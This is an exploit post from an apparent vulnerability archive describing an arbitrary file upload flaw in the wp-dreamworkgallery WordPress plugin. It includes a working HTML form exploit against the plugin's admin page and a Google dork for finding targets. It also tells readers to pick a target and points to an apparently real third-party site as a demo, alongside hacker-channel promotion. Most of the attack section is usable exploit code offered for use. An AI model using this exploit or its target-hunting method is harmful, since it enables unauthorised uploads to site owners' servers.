Wordpress dreamwork_manage File Upload Vulnerability

2017.04.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##################################################JokerSecurity################################ # Title : Wordpress File Upload Vulnerability # Dork : inurl:/wp-content/plugins/wp-dreamworkgallery # Tested on: [ Kali-Linux] # MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25 # Myblog : http://kader-information.blogspot.com/ # Link video : https://www.youtube.com/watch?v=h1xWghkVPEw # Date: 2/04/2017 ###################### # [+] DESCRIPTION : ###################### # 1: Search Google Dork and Choose a Target ########### Code exploit : ########### <html> <body> <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html> ###### # 3 Upload Your File ==== File.html ###### Demo : ###### http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml ###################### subscribe for my channel and page in facebook # My Blogger : http://kader-information.blogspot.com/ # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials # Page FacebOOK 3 : https://www.facebook.com/Professional.hacker.25 By <3 ##################################################JokerSecurity###############################

References:

https://www.facebook.com/AnonymousPalestine.vip/
https://www.youtube.com/watch?v=h1xWghkVPEw


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top